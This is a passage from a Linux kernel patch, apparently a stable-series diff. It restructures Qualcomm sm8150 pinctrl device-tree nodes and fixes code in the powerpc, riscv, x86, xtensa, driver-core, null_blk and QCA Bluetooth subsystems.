++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -2284,422 +2284,302 @@ tlmm: pinctrl@3100000 {
+ 			#interrupt-cells = <2>;
+ 			wakeup-parent = <&pdc>;
+ 
+-			qup_i2c0_default: qup-i2c0-default {
+-				mux {
+-					pins = "gpio0", "gpio1";
+-					function = "qup0";
+-				};
+-
+-				config {
+-					pins = "gpio0", "gpio1";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c0_default: qup-i2c0-default-state {
++				pins = "gpio0", "gpio1";
++				function = "qup0";
++				drive-strength = <0x02>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi0_default: qup-spi0-default {
++			qup_spi0_default: qup-spi0-default-state {
+ 				pins = "gpio0", "gpio1", "gpio2", "gpio3";
+ 				function = "qup0";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c1_default: qup-i2c1-default {
+-				mux {
+-					pins = "gpio114", "gpio115";
+-					function = "qup1";
+-				};
+-
+-				config {
+-					pins = "gpio114", "gpio115";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c1_default: qup-i2c1-default-state {
++				pins = "gpio114", "gpio115";
++				function = "qup1";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi1_default: qup-spi1-default {
++			qup_spi1_default: qup-spi1-default-state {
+ 				pins = "gpio114", "gpio115", "gpio116", "gpio117";
+ 				function = "qup1";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c2_default: qup-i2c2-default {
+-				mux {
+-					pins = "gpio126", "gpio127";
+-					function = "qup2";
+-				};
+-
+-				config {
+-					pins = "gpio126", "gpio127";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c2_default: qup-i2c2-default-state {
++				pins = "gpio126", "gpio127";
++				function = "qup2";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi2_default: qup-spi2-default {
++			qup_spi2_default: qup-spi2-default-state {
+ 				pins = "gpio126", "gpio127", "gpio128", "gpio129";
+ 				function = "qup2";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c3_default: qup-i2c3-default {
+-				mux {
+-					pins = "gpio144", "gpio145";
+-					function = "qup3";
+-				};
+-
+-				config {
+-					pins = "gpio144", "gpio145";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c3_default: qup-i2c3-default-state {
++				pins = "gpio144", "gpio145";
++				function = "qup3";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi3_default: qup-spi3-default {
++			qup_spi3_default: qup-spi3-default-state {
+ 				pins = "gpio144", "gpio145", "gpio146", "gpio147";
+ 				function = "qup3";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c4_default: qup-i2c4-default {
+-				mux {
+-					pins = "gpio51", "gpio52";
+-					function = "qup4";
+-				};
+-
+-				config {
+-					pins = "gpio51", "gpio52";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c4_default: qup-i2c4-default-state {
++				pins = "gpio51", "gpio52";
++				function = "qup4";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi4_default: qup-spi4-default {
++			qup_spi4_default: qup-spi4-default-state {
+ 				pins = "gpio51", "gpio52", "gpio53", "gpio54";
+ 				function = "qup4";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c5_default: qup-i2c5-default {
+-				mux {
+-					pins = "gpio121", "gpio122";
+-					function = "qup5";
+-				};
+-
+-				config {
+-					pins = "gpio121", "gpio122";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c5_default: qup-i2c5-default-state {
++				pins = "gpio121", "gpio122";
++				function = "qup5";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi5_default: qup-spi5-default {
++			qup_spi5_default: qup-spi5-default-state {
+ 				pins = "gpio119", "gpio120", "gpio121", "gpio122";
+ 				function = "qup5";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c6_default: qup-i2c6-default {
+-				mux {
+-					pins = "gpio6", "gpio7";
+-					function = "qup6";
+-				};
+-
+-				config {
+-					pins = "gpio6", "gpio7";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c6_default: qup-i2c6-default-state {
++				pins = "gpio6", "gpio7";
++				function = "qup6";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi6_default: qup-spi6_default {
++			qup_spi6_default: qup-spi6_default-state {
+ 				pins = "gpio4", "gpio5", "gpio6", "gpio7";
+ 				function = "qup6";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c7_default: qup-i2c7-default {
+-				mux {
+-					pins = "gpio98", "gpio99";
+-					function = "qup7";
+-				};
+-
+-				config {
+-					pins = "gpio98", "gpio99";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c7_default: qup-i2c7-default-state {
++				pins = "gpio98", "gpio99";
++				function = "qup7";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi7_default: qup-spi7_default {
++			qup_spi7_default: qup-spi7_default-state {
+ 				pins = "gpio98", "gpio99", "gpio100", "gpio101";
+ 				function = "qup7";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c8_default: qup-i2c8-default {
+-				mux {
+-					pins = "gpio88", "gpio89";
+-					function = "qup8";
+-				};
+-
+-				config {
+-					pins = "gpio88", "gpio89";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c8_default: qup-i2c8-default-state {
++				pins = "gpio88", "gpio89";
++				function = "qup8";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi8_default: qup-spi8-default {
++			qup_spi8_default: qup-spi8-default-state {
+ 				pins = "gpio88", "gpio89", "gpio90", "gpio91";
+ 				function = "qup8";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c9_default: qup-i2c9-default {
+-				mux {
+-					pins = "gpio39", "gpio40";
+-					function = "qup9";
+-				};
+-
+-				config {
+-					pins = "gpio39", "gpio40";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c9_default: qup-i2c9-default-state {
++				pins = "gpio39", "gpio40";
++				function = "qup9";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi9_default: qup-spi9-default {
++			qup_spi9_default: qup-spi9-default-state {
+ 				pins = "gpio39", "gpio40", "gpio41", "gpio42";
+ 				function = "qup9";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c10_default: qup-i2c10-default {
+-				mux {
+-					pins = "gpio9", "gpio10";
+-					function = "qup10";
+-				};
+-
+-				config {
+-					pins = "gpio9", "gpio10";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c10_default: qup-i2c10-default-state {
++				pins = "gpio9", "gpio10";
++				function = "qup10";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi10_default: qup-spi10-default {
++			qup_spi10_default: qup-spi10-default-state {
+ 				pins = "gpio9", "gpio10", "gpio11", "gpio12";
+ 				function = "qup10";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c11_default: qup-i2c11-default {
+-				mux {
+-					pins = "gpio94", "gpio95";
+-					function = "qup11";
+-				};
+-
+-				config {
+-					pins = "gpio94", "gpio95";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c11_default: qup-i2c11-default-state {
++				pins = "gpio94", "gpio95";
++				function = "qup11";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi11_default: qup-spi11-default {
++			qup_spi11_default: qup-spi11-default-state {
+ 				pins = "gpio92", "gpio93", "gpio94", "gpio95";
+ 				function = "qup11";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c12_default: qup-i2c12-default {
+-				mux {
+-					pins = "gpio83", "gpio84";
+-					function = "qup12";
+-				};
+-
+-				config {
+-					pins = "gpio83", "gpio84";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c12_default: qup-i2c12-default-state {
++				pins = "gpio83", "gpio84";
++				function = "qup12";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi12_default: qup-spi12-default {
++			qup_spi12_default: qup-spi12-default-state {
+ 				pins = "gpio83", "gpio84", "gpio85", "gpio86";
+ 				function = "qup12";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c13_default: qup-i2c13-default {
+-				mux {
+-					pins = "gpio43", "gpio44";
+-					function = "qup13";
+-				};
+-
+-				config {
+-					pins = "gpio43", "gpio44";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c13_default: qup-i2c13-default-state {
++				pins = "gpio43", "gpio44";
++				function = "qup13";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi13_default: qup-spi13-default {
++			qup_spi13_default: qup-spi13-default-state {
+ 				pins = "gpio43", "gpio44", "gpio45", "gpio46";
+ 				function = "qup13";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c14_default: qup-i2c14-default {
+-				mux {
+-					pins = "gpio47", "gpio48";
+-					function = "qup14";
+-				};
+-
+-				config {
+-					pins = "gpio47", "gpio48";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c14_default: qup-i2c14-default-state {
++				pins = "gpio47", "gpio48";
++				function = "qup14";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi14_default: qup-spi14-default {
++			qup_spi14_default: qup-spi14-default-state {
+ 				pins = "gpio47", "gpio48", "gpio49", "gpio50";
+ 				function = "qup14";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c15_default: qup-i2c15-default {
+-				mux {
+-					pins = "gpio27", "gpio28";
+-					function = "qup15";
+-				};
+-
+-				config {
+-					pins = "gpio27", "gpio28";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c15_default: qup-i2c15-default-state {
++				pins = "gpio27", "gpio28";
++				function = "qup15";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi15_default: qup-spi15-default {
++			qup_spi15_default: qup-spi15-default-state {
+ 				pins = "gpio27", "gpio28", "gpio29", "gpio30";
+ 				function = "qup15";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c16_default: qup-i2c16-default {
+-				mux {
+-					pins = "gpio86", "gpio85";
+-					function = "qup16";
+-				};
+-
+-				config {
+-					pins = "gpio86", "gpio85";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c16_default: qup-i2c16-default-state {
++				pins = "gpio86", "gpio85";
++				function = "qup16";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi16_default: qup-spi16-default {
++			qup_spi16_default: qup-spi16-default-state {
+ 				pins = "gpio83", "gpio84", "gpio85", "gpio86";
+ 				function = "qup16";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c17_default: qup-i2c17-default {
+-				mux {
+-					pins = "gpio55", "gpio56";
+-					function = "qup17";
+-				};
+-
+-				config {
+-					pins = "gpio55", "gpio56";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c17_default: qup-i2c17-default-state {
++				pins = "gpio55", "gpio56";
++				function = "qup17";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi17_default: qup-spi17-default {
++			qup_spi17_default: qup-spi17-default-state {
+ 				pins = "gpio55", "gpio56", "gpio57", "gpio58";
+ 				function = "qup17";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c18_default: qup-i2c18-default {
+-				mux {
+-					pins = "gpio23", "gpio24";
+-					function = "qup18";
+-				};
+-
+-				config {
+-					pins = "gpio23", "gpio24";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c18_default: qup-i2c18-default-state {
++				pins = "gpio23", "gpio24";
++				function = "qup18";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi18_default: qup-spi18-default {
++			qup_spi18_default: qup-spi18-default-state {
+ 				pins = "gpio23", "gpio24", "gpio25", "gpio26";
+ 				function = "qup18";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c19_default: qup-i2c19-default {
+-				mux {
+-					pins = "gpio57", "gpio58";
+-					function = "qup19";
+-				};
+-
+-				config {
+-					pins = "gpio57", "gpio58";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c19_default: qup-i2c19-default-state {
++				pins = "gpio57", "gpio58";
++				function = "qup19";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi19_default: qup-spi19-default {
++			qup_spi19_default: qup-spi19-default-state {
+ 				pins = "gpio55", "gpio56", "gpio57", "gpio58";
+ 				function = "qup19";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			pcie0_default_state: pcie0-default {
+-				perst {
++			pcie0_default_state: pcie0-default-state {
++				perst-pins {
+ 					pins = "gpio35";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+ 					bias-pull-down;
+ 				};
+ 
+-				clkreq {
++				clkreq-pins {
+ 					pins = "gpio36";
+ 					function = "pci_e0";
+ 					drive-strength = <2>;
+ 					bias-pull-up;
+ 				};
+ 
+-				wake {
++				wake-pins {
+ 					pins = "gpio37";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+@@ -2707,22 +2587,22 @@ wake {
+ 				};
+ 			};
+ 
+-			pcie1_default_state: pcie1-default {
+-				perst {
++			pcie1_default_state: pcie1-default-state {
++				perst-pins {
+ 					pins = "gpio102";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+ 					bias-pull-down;
+ 				};
+ 
+-				clkreq {
++				clkreq-pins {
+ 					pins = "gpio103";
+ 					function = "pci_e1";
+ 					drive-strength = <2>;
+ 					bias-pull-up;
+ 				};
+ 
+-				wake {
++				wake-pins {
+ 					pins = "gpio104";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+diff --git a/arch/powerpc/include/asm/uaccess.h b/arch/powerpc/include/asm/uaccess.h
+index 45d4c9cf3f3a2..661046150e49f 100644
+--- a/arch/powerpc/include/asm/uaccess.h
++++ b/arch/powerpc/include/asm/uaccess.h
+@@ -80,9 +80,20 @@ __pu_failed:							\
+ 		:						\
+ 		: label)
+ 
++#ifdef CONFIG_CC_IS_CLANG
++#define DS_FORM_CONSTRAINT "Z<>"
++#else
++#define DS_FORM_CONSTRAINT "YZ<>"
++#endif
++
+ #ifdef __powerpc64__
+-#define __put_user_asm2_goto(x, ptr, label)			\
+-	__put_user_asm_goto(x, ptr, label, "std")
++#define __put_user_asm2_goto(x, addr, label)			\
++	asm goto ("1: std%U1%X1 %0,%1	# put_user\n"		\
++		EX_TABLE(1b, %l2)				\
++		:						\
++		: "r" (x), DS_FORM_CONSTRAINT (*addr)		\
++		:						\
++		: label)
+ #else /* __powerpc64__ */
+ #define __put_user_asm2_goto(x, addr, label)			\
+ 	asm goto(					\
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 7c4852af9e3f1..7ba5c244f3a07 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -213,18 +213,19 @@ static void __init setup_bootmem(void)
+ 	if (!IS_ENABLED(CONFIG_XIP_KERNEL))
+ 		phys_ram_base = memblock_start_of_DRAM();
+ 	/*
+-	 * memblock allocator is not aware of the fact that last 4K bytes of
+-	 * the addressable memory can not be mapped because of IS_ERR_VALUE
+-	 * macro. Make sure that last 4k bytes are not usable by memblock
+-	 * if end of dram is equal to maximum addressable memory.  For 64-bit
+-	 * kernel, this problem can't happen here as the end of the virtual
+-	 * address space is occupied by the kernel mapping then this check must
+-	 * be done as soon as the kernel mapping base address is determined.
++	 * Reserve physical address space that would be mapped to virtual
++	 * addresses greater than (void *)(-PAGE_SIZE) because:
++	 *  - This memory would overlap with ERR_PTR
++	 *  - This memory belongs to high memory, which is not supported
++	 *
++	 * This is not applicable to 64-bit kernel, because virtual addresses
++	 * after (void *)(-PAGE_SIZE) are not linearly mapped: they are
++	 * occupied by kernel mapping. Also it is unrealistic for high memory
++	 * to exist on 64-bit platforms.
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_64BIT)) {
+-		max_mapped_addr = __pa(~(ulong)0);
+-		if (max_mapped_addr == (phys_ram_end - 1))
+-			memblock_set_current_limit(max_mapped_addr - 4096);
++		max_mapped_addr = __va_to_pa_nodebug(-PAGE_SIZE);
++		memblock_reserve(max_mapped_addr, (phys_addr_t)-max_mapped_addr);
+ 	}
+ 
+ 	min_low_pfn = PFN_UP(phys_ram_base);
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 9587e44874152..d0557a4ab8f9b 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -386,17 +386,33 @@ int set_direct_map_default_noflush(struct page *page)
+ }
+ 
+ #ifdef CONFIG_DEBUG_PAGEALLOC
++static int debug_pagealloc_set_page(pte_t *pte, unsigned long addr, void *data)
++{
++	int enable = *(int *)data;
++
++	unsigned long val = pte_val(ptep_get(pte));
++
++	if (enable)
++		val |= _PAGE_PRESENT;
++	else
++		val &= ~_PAGE_PRESENT;
++
++	set_pte(pte, __pte(val));
++
++	return 0;
++}
++
+ void __kernel_map_pages(struct page *page, int numpages, int enable)
+ {
+ 	if (!debug_pagealloc_enabled())
+ 		return;
+ 
+-	if (enable)
+-		__set_memory((unsigned long)page_address(page), numpages,
+-			     __pgprot(_PAGE_PRESENT), __pgprot(0));
+-	else
+-		__set_memory((unsigned long)page_address(page), numpages,
+-			     __pgprot(0), __pgprot(_PAGE_PRESENT));
++	unsigned long start = (unsigned long)page_address(page);
++	unsigned long size = PAGE_SIZE * numpages;
++
++	apply_to_existing_page_range(&init_mm, start, size, debug_pagealloc_set_page, &enable);
++
++	flush_tlb_kernel_range(start, start + size);
+ }
+ #endif
+ 
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 6e61baff223f8..897f56533e6cc 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -115,9 +115,9 @@ vmlinux-objs-$(CONFIG_INTEL_TDX_GUEST) += $(obj)/tdx.o $(obj)/tdcall.o
+ 
+ vmlinux-objs-$(CONFIG_EFI) += $(obj)/efi.o
+ vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_mixed.o
+-vmlinux-objs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
++vmlinux-libs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
+ 
+-$(obj)/vmlinux: $(vmlinux-objs-y) FORCE
++$(obj)/vmlinux: $(vmlinux-objs-y) $(vmlinux-libs-y) FORCE
+ 	$(call if_changed,ld)
+ 
+ OBJCOPYFLAGS_vmlinux.bin :=  -R .comment -S
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 8ea24df3c5ff1..e8cc042e4905c 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -195,7 +195,14 @@ static int __amd_smn_rw(u16 node, u32 address, u32 *value, bool write)
+ 
+ int amd_smn_read(u16 node, u32 address, u32 *value)
+ {
+-	return __amd_smn_rw(node, address, value, false);
++	int err = __amd_smn_rw(node, address, value, false);
++
++	if (PCI_POSSIBLE_ERROR(*value)) {
++		err = -ENODEV;
++		*value = 0;
++	}
++
++	return err;
+ }
+ EXPORT_SYMBOL_GPL(amd_smn_read);
+ 
+diff --git a/arch/xtensa/include/asm/processor.h b/arch/xtensa/include/asm/processor.h
+index 228e4dff5fb2d..ab555a980147b 100644
+--- a/arch/xtensa/include/asm/processor.h
++++ b/arch/xtensa/include/asm/processor.h
+@@ -113,9 +113,9 @@
+ #define MAKE_RA_FOR_CALL(ra,ws)   (((ra) & 0x3fffffff) | (ws) << 30)
+ 
+ /* Convert return address to a valid pc
+- * Note: We assume that the stack pointer is in the same 1GB ranges as the ra
++ * Note: 'text' is the address within the same 1GB range as the ra
+  */
+-#define MAKE_PC_FROM_RA(ra,sp)    (((ra) & 0x3fffffff) | ((sp) & 0xc0000000))
++#define MAKE_PC_FROM_RA(ra, text) (((ra) & 0x3fffffff) | ((unsigned long)(text) & 0xc0000000))
+ 
+ #elif defined(__XTENSA_CALL0_ABI__)
+ 
+@@ -125,9 +125,9 @@
+ #define MAKE_RA_FOR_CALL(ra, ws)   (ra)
+ 
+ /* Convert return address to a valid pc
+- * Note: We assume that the stack pointer is in the same 1GB ranges as the ra
++ * Note: 'text' is not used as 'ra' is always the full address
+  */
+-#define MAKE_PC_FROM_RA(ra, sp)    (ra)
++#define MAKE_PC_FROM_RA(ra, text)  (ra)
+ 
+ #else
+ #error Unsupported Xtensa ABI
+diff --git a/arch/xtensa/include/asm/ptrace.h b/arch/xtensa/include/asm/ptrace.h
+index 308f209a47407..17c5cbd1832e7 100644
+--- a/arch/xtensa/include/asm/ptrace.h
++++ b/arch/xtensa/include/asm/ptrace.h
+@@ -87,7 +87,7 @@ struct pt_regs {
+ # define user_mode(regs) (((regs)->ps & 0x00000020)!=0)
+ # define instruction_pointer(regs) ((regs)->pc)
+ # define return_pointer(regs) (MAKE_PC_FROM_RA((regs)->areg[0], \
+-					       (regs)->areg[1]))
++					       (regs)->pc))
+ 
+ # ifndef CONFIG_SMP
+ #  define profile_pc(regs) instruction_pointer(regs)
+diff --git a/arch/xtensa/kernel/process.c b/arch/xtensa/kernel/process.c
+index 68e0e2f06d660..3138f72dcbe2e 100644
+--- a/arch/xtensa/kernel/process.c
++++ b/arch/xtensa/kernel/process.c
+@@ -47,6 +47,7 @@
+ #include <asm/asm-offsets.h>
+ #include <asm/regs.h>
+ #include <asm/hw_breakpoint.h>
++#include <asm/sections.h>
+ #include <asm/traps.h>
+ 
+ extern void ret_from_fork(void);
+@@ -379,7 +380,7 @@ unsigned long __get_wchan(struct task_struct *p)
+ 	int count = 0;
+ 
+ 	sp = p->thread.sp;
+-	pc = MAKE_PC_FROM_RA(p->thread.ra, p->thread.sp);
++	pc = MAKE_PC_FROM_RA(p->thread.ra, _text);
+ 
+ 	do {
+ 		if (sp < stack_page + sizeof(struct task_struct) ||
+@@ -391,7 +392,7 @@ unsigned long __get_wchan(struct task_struct *p)
+ 
+ 		/* Stack layout: sp-4: ra, sp-3: sp' */
+ 
+-		pc = MAKE_PC_FROM_RA(SPILL_SLOT(sp, 0), sp);
++		pc = MAKE_PC_FROM_RA(SPILL_SLOT(sp, 0), _text);
+ 		sp = SPILL_SLOT(sp, 1);
+ 	} while (count++ < 16);
+ 	return 0;
+diff --git a/arch/xtensa/kernel/stacktrace.c b/arch/xtensa/kernel/stacktrace.c
+index 7f7755cd28f07..b69044893287f 100644
+--- a/arch/xtensa/kernel/stacktrace.c
++++ b/arch/xtensa/kernel/stacktrace.c
+@@ -12,6 +12,8 @@
+ #include <linux/sched.h>
+ #include <linux/stacktrace.h>
+ 
++#include <asm/ftrace.h>
++#include <asm/sections.h>
+ #include <asm/stacktrace.h>
+ #include <asm/traps.h>
+ #include <linux/uaccess.h>
+@@ -188,7 +190,7 @@ void walk_stackframe(unsigned long *sp,
+ 		if (a1 <= (unsigned long)sp)
+ 			break;
+ 
+-		frame.pc = MAKE_PC_FROM_RA(a0, a1);
++		frame.pc = MAKE_PC_FROM_RA(a0, _text);
+ 		frame.sp = a1;
+ 
+ 		if (fn(&frame, data))
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 8d87808cdb8aa..30204e62497c2 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -2657,8 +2657,11 @@ static ssize_t uevent_show(struct device *dev, struct device_attribute *attr,
+ 	if (!env)
+ 		return -ENOMEM;
+ 
++	/* Synchronize with really_probe() */
++	device_lock(dev);
+ 	/* let the kset specific function add its keys */
+ 	retval = kset->uevent_ops->uevent(&dev->kobj, env);
++	device_unlock(dev);
+ 	if (retval)
+ 		goto out;
+ 
+diff --git a/drivers/block/null_blk/zoned.c b/drivers/block/null_blk/zoned.c
+index 55a69e48ef8bc..b0264b3df6f3d 100644
+--- a/drivers/block/null_blk/zoned.c
++++ b/drivers/block/null_blk/zoned.c
+@@ -112,7 +112,7 @@ int null_init_zoned_dev(struct nullb_device *dev, struct request_queue *q)
+ 	if (dev->zone_max_active && dev->zone_max_open > dev->zone_max_active) {
+ 		dev->zone_max_open = dev->zone_max_active;
+ 		pr_info("changed the maximum number of open zones to %u\n",
+-			dev->nr_zones);
++			dev->zone_max_open);
+ 	} else if (dev->zone_max_open >= dev->nr_zones - dev->zone_nr_conv) {
+ 		dev->zone_max_open = 0;
+ 		pr_info("zone_max_open limit disabled, limit >= zone count\n");
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 2dda94a0875a6..35fb26cbf2294 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -408,6 +408,14 @@ static int qca_tlv_check_data(struct hci_dev *hdev,
+ 
+ 			/* Update NVM tags as needed */
+ 			switch (tag_id) {
++			case EDL_TAG_ID_BD_ADDR:
++				if (tag_len != sizeof(bdaddr_t))
++					return -EINVAL;
++
++				memcpy(&config->bdaddr, tlv_nvm->data, sizeof(bdaddr_t));
++
++				break;
++
+ 			case EDL_TAG_ID_HCI:
+ 				if (tag_len < 3)
+ 					return -EINVAL;
+@@ -682,6 +690,38 @@ int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ }
+ EXPORT_SYMBOL_GPL(qca_set_bdaddr_rome);
+ 
++static int qca_check_bdaddr(struct hci_dev *hdev, const struct qca_fw_config *config)
++{
++	struct hci_rp_read_bd_addr *bda;
++	struct sk_buff *skb;
++	int err;
++
++	if (bacmp(&hdev->public_addr, BDADDR_ANY))
++		return 0;
++
++	skb = __hci_cmd_sync(hdev, HCI_OP_READ_BD_ADDR, 0, NULL,
++			     HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		err = PTR_ERR(skb);
++		bt_dev_err(hdev, "Failed to read device address (%d)", err);
++		return err;
++	}
++
++	if (skb->len != sizeof(*bda)) {
++		bt_dev_err(hdev, "Device address length mismatch");
++		kfree_skb(skb);
++		return -EIO;
++	}
++
++	bda = (struct hci_rp_read_bd_addr *)skb->data;
++	if (!bacmp(&bda->bdaddr, &config->bdaddr))
++		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++
++	kfree_skb(skb);
++
++	return 0;
++}
++
+ static void qca_generate_hsp_nvm_name(char *fwname, size_t max_size,
+ 		struct qca_btsoc_version ver, u8 rom_ver, u16 bid)
+ {
+@@ -703,7 +743,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		   enum qca_btsoc_type soc_type, struct qca_btsoc_version ver,
+ 		   const char *firmware_name)
+ {
+-	struct qca_fw_config config;
++	struct qca_fw_config config = {};
+ 	int err;
+ 	u8 rom_ver = 0;
+ 	u32 soc_ver;
+@@ -888,6 +928,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		break;
+ 	}
+ 
++	err = qca_check_bdaddr(hdev, &config);
++	if (err)
++		return err;
++
+ 	bt_dev_info(hdev, "QCA setup on UART is completed");
+ 
+ 	return 0;
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 38e2fbc950248..215433fd76a10 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -29,6 +29,7 @@
+ #define EDL_PATCH_CONFIG_RES_EVT	(0x00)
+ #define QCA_DISABLE_LOGGING_SUB_OP	(0x14)
+ 
++#define EDL_TAG_ID_BD_ADDR		2
+ #define EDL_TAG_ID_HCI			(17)
+ #define EDL_TAG_ID_DEEP_SLEEP		(27)
+ 
+@@ -93,6 +94,7 @@ struct qca_fw_config {
+ 	uint8_t user_baud_rate;
+ 	enum qca_tlv_dnld_mode dnld_mode;
+ 	enum qca_tlv_dnld_mode dnld_type;
++	bdaddr_t bdaddr;
+ };
+ 
+ struct edl_event_hdr {
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index a0e2b5d992695..070014d0fc994 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1853,8 +1853,6 @@ static int qca_setup(struct hci_uart *hu)
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+ 	case QCA_WCN7850:
+-		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+-
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 		if (qcadev->bdaddr_property_broken)
+ 			set_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks);
+diff --git a/drivers/clk/sifive/sifive-prci.c b/drivers/clk/sifive/sifive-prci.c
